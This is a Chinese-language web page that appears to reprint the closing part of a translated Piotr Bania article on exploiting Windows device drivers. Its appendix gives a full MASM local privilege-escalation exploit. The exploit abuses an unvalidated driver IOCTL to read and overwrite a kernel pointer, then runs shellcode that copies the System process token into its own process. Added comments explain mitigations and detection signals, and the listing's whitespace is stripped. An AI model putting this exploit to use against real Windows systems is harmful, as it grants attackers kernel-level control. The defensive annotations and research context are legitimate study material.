
详解如何利用Windows设备驱动

 2009-02-12 13:55:33 来源:WEB开发网   
核心提示(详解如何利用Windows设备驱动(10)): 结束语 最后希望你能够喜欢这个文档,如果你有什么疑问不能解决,请联系我,所有文章中设计的程序可以在网站http://pb.specialised.info 上下载

结束语

最后希望你能够喜欢这个文档,如果你有什么疑问不能解决,请联系我。所有文章中设计的程序可以在网站http://pb.specialised.info 上下载。

参考文献:

1) Win32 Device Drivers Communication Vulnerabilities

2) "Remote Windows Kernel Exploitation – Step into the Ring 0", by Barnaby Jack –

eEYE digital security – http://www.eeye.com

3) Eyas shellcode publication - ?

4) "The Windows 2000/NT Native Api Reference", by Gary Nebett

5) "Windows Syscall Shellcode", by myself -http://www.securityfocus.net/infocus/1844

6) http://pb.specialised.info

附录:exploit

   ;------------------------------------------------------------
  ;Samplelocaldevicedriverexploit
  ;byPiotrBania 
  ;http://pb.specialised.info
  ;Allrightsreserved
  ;------------------------------------------------------------
  ; Reviewer note: this copy of the listing lost its whitespace in
  ; extraction, so mnemonics, operands and comments run together. The
  ; code bytes are left exactly as printed; only comments were added.
  ; Syntax: MASM, 32-bit. Target per the hard-coded offsets further
  ; down: one specific 32-bit Windows XP build. The macros @callx,
  ; @check, @pushsz, @debug and @get_api_addr come from my_macro.inc /
  ; debug.inc, which are not part of this page.
  includemy_macro.inc
  DEVICE_NAMEequ".BUGGY" ; the author's sample target driver (reference 1 on the page)
  MY_ADDRESSequ000110000h ; fixed user-mode address for the working buffer
  MY_ADDRESS_SIZEequ512h ; 0x512 bytes: packet header + 512 copied bytes + shellcode
  D_PACKETstruct ; input buffer layout handed to the driver (see talk2device)
  dp_destdd0 ; driver appears to treat this as copy destination (inferred from main flow; driver not shown)
  dp_srcdd0 ; ... and this as copy source
  D_PACKETends
  ; ---- main flow (the 'start' label named by 'end start' is outside this excerpt) ----
  ; Step 1: learn, as an RVA, where ntoskrnl keeps the pointer that
  ; KeUserModeCallback calls through, then rebase it to the running
  ; kernel's real load address.
  callfind_KeUserModeCallback_Routine
  callget_ntos_base
  moveax,dwordptr[real_ntos_base]
  adddwordptr[KeUserModeCallback_Routine],eax ; RVA -> kernel virtual address
  callopen_device
  movebx,eax ; ebx = device handle, consumed by talk2device
  ; Step 2: commit a RWX buffer at the fixed address MY_ADDRESS.
  ; (A fixed-address RWX commit from an unprivileged process is itself
  ; a usable detection signal.)
  pushPAGE_EXECUTE_READWRITE
  pushMEM_COMMIT
  pushMY_ADDRESS_SIZE
  pushMY_ADDRESS
  @callxVirtualAlloc
  @check0,"Error:cannotallocatememory!" ; macro from my_macro.inc; presumably aborts when eax == 0
  movedi,eax ; edi = buffer: D_PACKET header, then payload area at +8
  ; Step 3: first IOCTL. The packet asks the driver to copy 512 bytes
  ; from dp_src (the kernel pointer slot) to dp_dest (edi+8, user memory).
  ; This only works because the driver copies between caller-supplied
  ; addresses without validating them -- an arbitrary kernel read/write.
  ; Defender side: ProbeForRead/ProbeForWrite (under __try/__except) on
  ; every embedded pointer, or refusing pointers in the buffer at all,
  ; removes the primitive this whole listing rests on.
  moveax,dwordptr[KeUserModeCallback_Routine]
  movdwordptr[routine_addr],eax ; patched into the shellcode body (see my_shellcode)
  mov[edi.D_PACKET.dp_src],eax
  mov[edi.D_PACKET.dp_dest],edi
  add[edi.D_PACKET.dp_dest],8
  movecx,512
  calltalk2device
  ; The original 512 kernel bytes now sit at edi+8; their first dword is
  ; the routine pointer the shellcode later restores.
  moveax,[edi+8]
  movdwordptr[old_routine],eax
  movdwordptr[old_routine2],eax
  @callxGetCurrentProcessId
  movdwordptr[my_pid],eax ; pid whose token the shellcode replaces
  pushedi
  movecx,my_shellcode_size
  addedi,512+8 ; payload area starts right after the copied bytes
  leaesi,my_shellcode
  repmovsb ; copy the shellcode after its embedded dd fields were patched above
  popedi
  ; Step 4: second IOCTL with src/dest swapped: the block is written back
  ; over the kernel slot, but its first dword now points at the user-mode
  ; copy of my_shellcode (edi+520). Note the size is MY_ADDRESS_SIZE
  ; (0x512) rather than the 512 bytes read earlier, so kernel memory
  ; after the slot is overwritten as well.
  mov[edi+8],edi
  add[edi+8],512+8
  moveax,[edi.D_PACKET.dp_src]
  movedx,[edi.D_PACKET.dp_dest]
  mov[edi.D_PACKET.dp_src],edx
  mov[edi.D_PACKET.dp_dest],eax
  movecx,MY_ADDRESS_SIZE
  calltalk2device
  ; The kernel-side hook fires on the next user-mode callback; by the
  ; time the message box below appears the shellcode has already run.
  pushMEM_DECOMMIT
  pushMY_ADDRESS_SIZE
  pushedi
  @callxVirtualFree
  @debug"I'mescalated!!!",MB_ICONINFORMATION ; debug.inc macro, presumably a MessageBox
  exit:
  push0
  @callxExitProcess
  ;------------------------------------------------------------
  ;DeviceDrivershellcode
  ;------------------------------------------------------------
  ; EPROCESS field offsets for one 32-bit Windows XP build. Any other
  ; build shifts them, which is why payloads of this kind are brittle
  ; and typically surface as bugchecks rather than clean escalations
  ; when run against an unexpected kernel.
  XP_PID_OFFSETequ084h ; EPROCESS.UniqueProcessId
  XP_FLINK_OFFSETequ088h ; EPROCESS.ActiveProcessLinks.Flink
  XP_TOKEN_OFFSETequ0C8h ; EPROCESS.Token
  XP_SYS_PIDequ04h ; PID of the System process
  my_shellcodeproc
  ; Executes in kernel context the next time the hooked pointer is
  ; called, although the bytes live in user memory (MY_ADDRESS+520).
  ; That "kernel executes user pages" shape is exactly what SMEP/SMAP
  ; and kernel-side pointer validation later closed off.
  ; The dd fields embedded between opcode bytes are patched by the
  ; main flow before the copy, so the immediates are filled at run time.
  ; All registers are preserved (pushad/popad) and control is handed to
  ; the original routine at the end, so the hooked call completes normally.
  pushad
  db0b8h;mov eax, old_routine (opcode byte, immediate follows)
  old_routinedd0;patched by main flow: original pointer value
  db0b9h;mov ecx, routine_addr
  routine_addrdd0;patched by main flow: kernel address of the pointer slot
  mov[ecx],eax;restore the original pointer first, so the hook fires only once
  ;-----------------------------------------
  ;startescalationprocedure
  ;-----------------------------------------
  moveax,dwordptrfs:[124h] ; fs:[124h] read as the current KTHREAD (KPCR-relative on 32-bit XP; build-specific)
  moveax,[eax+44h] ; +44h presumably the thread's owning process -- TODO confirm against this build's KTHREAD
  pusheax;EAX = our EPROCESS, kept for the second walk
  s1:moveax,[eax+XP_FLINK_OFFSET];EAX = EPROCESS.ActiveProcessLinks.Flink
  subeax,XP_FLINK_OFFSET;EAX = EPROCESS of the next process in the list
  cmp[eax+XP_PID_OFFSET],XP_SYS_PID;UniqueProcessId == System PID?
  jnes1;no, keep walking (no termination check: loops forever if PID 4 is absent)
  ;EAX = EPROCESS of System
  movedi,[eax+XP_TOKEN_OFFSET];ptr to EPROCESS.Token (EX_FAST_REF)
  andedi,0fffffff8h;low 3 bits hold a reference count; mask to get the TOKEN pointer
  popeax;EAX = our EPROCESS again
  db68h;push imm32 (opcode byte)
  my_piddd0;patched by main flow: PID to escalate
  popebx;EBX = pid to escalate
  s2:
  moveax,[eax+XP_FLINK_OFFSET];EAX = EPROCESS.ActiveProcessLinks.Flink
  subeax,XP_FLINK_OFFSET;EAX = EPROCESS of the next process
  cmp[eax+XP_PID_OFFSET],ebx;is it our PID?
  jnes2;no, try the next one
  mov[eax+XP_TOKEN_OFFSET],edi;classic token replacement: our process now carries System's token pointer
  ; Defender note: a process whose Token pointer equals the System
  ; process's token (and a token with a reference count that never
  ; accounted for it) is the forensic signature of this technique.
  popad
  db68h;push imm32: the original routine address
  old_routine2dd0;patched by main flow (same value as old_routine)
  ret ; push/ret = tail-jump into the original routine with the caller's arguments untouched
  tok_handledd0 ; unused; still counted in my_shellcode_size below
  my_shellcode_sizeequ$-offsetmy_shellcode ; bytes copied by the main flow's rep movsb
  my_shellcodeendp
  ;------------------------------------------------------------
  ;findstheKeUserModeCallback_Routinefromntoskrnl.exe
  ;------------------------------------------------------------
  find_KeUserModeCallback_Routineproc
  ; Resolves, in user mode and from the on-disk image, the RVA of the
  ; pointer slot that KeUserModeCallback calls through: maps ntoskrnl.exe
  ; as a plain data image, looks up the export, scans forward for the
  ; first 'call dword ptr [abs32]' (FF 15) and converts its operand to an
  ; RVA using the PE header's ImageBase.
  ; Out: [KeUserModeCallback_Routine] = RVA. All registers preserved.
  ; Assumes the on-disk kernel matches the running one.
  pushad
  push1;DONT_RESOLVE_DLL_REFERENCES
  push0
  @pushsz"C:windowssystem32ntoskrnl.exe"
  @callxLoadLibraryExA
  @check0,"Error:cannotloadlibrary"
  movebx,eax ; ebx = base of the mapped image
  @pushsz"KeUserModeCallback"
  pusheax
  @callxGetProcAddress
  movedi,eax ; edi = KeUserModeCallback entry in the mapped image
  @check0,"Error:cannotobtainKeUserModeCallbackaddress"
  scan_for_call:incedi ; byte-wise forward scan; no upper bound, so it depends on the pattern appearing
  cmpwordptr[edi],015FFh ; FF 15 = call dword ptr [abs32]
  jnescan_for_call
  moveax,[edi+2] ; absolute (as-linked) address of the pointer slot
  movecx,[ebx+3ch] ; e_lfanew
  addecx,ebx ; ecx = PE signature
  movecx,[ecx+34h] ; OptionalHeader.ImageBase (PE32: 4 + 20 + 1Ch)
  subeax,ecx ; eax = RVA of the slot
  movdwordptr[KeUserModeCallback_Routine],eax
  popad
  ret
  find_KeUserModeCallback_Routineendp
  ;------------------------------------------------------------
  ;Getsntoskrnl.exemodulebase(real)
  ;------------------------------------------------------------
  get_ntos_baseproc
  ; Obtains the running kernel's load address via
  ; NtQuerySystemInformation(SystemModuleInformation): the first module
  ; reported is taken to be ntoskrnl. Out: [real_ntos_base].
  ; Defender note: an unprivileged process learning kernel module bases
  ; is the information leak that turns an RVA into a usable kernel
  ; address; later Windows versions restrict this query for low-privilege
  ; callers, which is the mitigation for this step.
  local__MODULES:_MODULES ; stack copy of one entry, used only for the size probe
  pushad
  @get_api_addr"ntdll","NtQuerySystemInformation" ; macro from my_macro.inc; result presumably in eax
  @check0,"Error:cannotgrabNtQuerySystemInformationaddress"
  movebx,eax ; ebx = NtQuerySystemInformation
  calla1 ; pushes the address of 'ns' as the return address ...
  nsdd0 ; ... which the first query then uses as its ReturnLength pointer
  a1:push4 ; SystemInformationLength deliberately too small
  leaecx,[__MODULES]
  pushecx
  pushSystemModuleInformation
  calleax
  cmpeax,0c0000004h ; STATUS_INFO_LENGTH_MISMATCH: 'ns' now holds the needed size
  jneerror_ntos
  pushdwordptr[ns]
  pushGMEM_FIXEDorGMEM_ZEROINIT
  @callxGlobalAlloc
  movebp,eax ; ebp repurposed as buffer pointer; popad restores it before the proc epilogue
  push0 ; ReturnLength = NULL
  pushdwordptr[ns]
  pushebp
  pushSystemModuleInformation
  callebx
  testeax,eax ; STATUS_SUCCESS == 0
  jnzerror_ntos
  moveax,dwordptr[ebp.smi_Base] ; ImageBase of the first reported module
  movdwordptr[real_ntos_base],eax
  pushebp
  @callxGlobalFree
  popad
  ret
  error_ntos:xoreax,eax ; eax = 0 so that @check fires; the pushad frame is not unwound here
  @check0,"Error:cannotexecuteNtQuerySystemInformation"
  get_ntos_baseendp
  ;------------------------------------------------------------
  ;Opensthedevicewearetryingtoattack
  ;------------------------------------------------------------
  open_deviceproc
  ; CreateFileA(DEVICE_NAME, 0, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)
  ; Out: eax = device handle (stored into the pushad-saved EAX slot so
  ; popad returns it). All other registers preserved.
  ; Defender note: the open succeeds for an unprivileged caller because
  ; the device object carries no restrictive DACL; creating the device
  ; with a proper security descriptor (IoCreateDeviceSecure /
  ; FILE_DEVICE_SECURE_OPEN) is the usual fix.
  pushad
  push0 ; hTemplateFile
  push80h ; FILE_ATTRIBUTE_NORMAL
  push3 ; OPEN_EXISTING
  push0 ; lpSecurityAttributes
  push0 ; dwShareMode
  push0 ; dwDesiredAccess = 0: enough, since the IOCTL used later requires FILE_ANY_ACCESS
  @pushszDEVICE_NAME
  @callxCreateFileA
  @check-1,"Error:cannotopendevice!" ; INVALID_HANDLE_VALUE
  movdwordptr[esp+PUSHA_STRUCT._EAX],eax ; PUSHA_STRUCT presumably declared in my_macro.inc
  popad
  ret
  open_deviceendp
  ;------------------------------------------------------------
  ;Procedurethatcommunicateswiththedriver
  ;
  ;ENTRY->EDI=INPUTBUFFER
  ;ECX=INPUTBUFFERSIZE
  ;EBX=DEVICEHANDLE
  ;------------------------------------------------------------
  talk2deviceproc
  ; DeviceIoControl(ebx, 011111111h, edi, ecx, NULL, 0, &bytes_ret, NULL)
  ; In: edi = input buffer, ecx = input buffer size, ebx = device handle.
  ; All registers preserved. Aborts via @check if the call fails.
  ; Defender note: everything the driver must validate arrives through
  ; this call -- control code, buffer and length; the pointers inside
  ; the D_PACKET buffer are what need checking before any copy.
  pushad
  push0 ; lpOverlapped
  pushoffsetbytes_ret ; lpBytesReturned
  push0 ; nOutBufferSize
  push0 ; lpOutBuffer
  pushecx ; nInBufferSize
  pushedi ; lpInBuffer
  push011111111h ; dwIoControlCode, hard-coded; its access bits (14-15) are zero = FILE_ANY_ACCESS
  pushebx ; hDevice
  @callxDeviceIoControl
  @check0,"Error:Send()failed"
  popad
  ret
  bytes_retdd0 ; writable data kept inside the code section; belongs in .data
  talk2deviceendp
  _MODULESstruct ; appears to mirror the 32-bit SystemModuleInformation layout: count, then the first entry
  dwNModulesdd0 ; number of modules
  smi_Reserveddd2dup(0) ; two reserved pointers preceding the base
  smi_Basedd0 ; module image base -- the only field get_ntos_base reads
  smi_Sizedd0 ; image size
  smi_Flagsdd0
  smi_Indexdw0 ; load order index
  smi_Unknowndw0
  smi_LoadCountdw0
  smi_ModuleNamedw0 ; offset of the file name within the path below
  smi_ImageNamedb256dup(0) ; full path, 256 bytes
  ends
  SystemModuleInformationequ11 ; SYSTEM_INFORMATION_CLASS value used by get_ntos_base
  KeUserModeCallback_Routinedd0 ; RVA from find_KeUserModeCallback_Routine, rebased in the main flow
  real_ntos_basedd0 ; filled by get_ntos_base
  basedd0 ; unused in this listing
  includedebug.inc
  endstart ; entry label 'start' is not within this excerpt

原文作者:Piotr Bania

译者BLOG:http://hi.baidu.com/ayarei


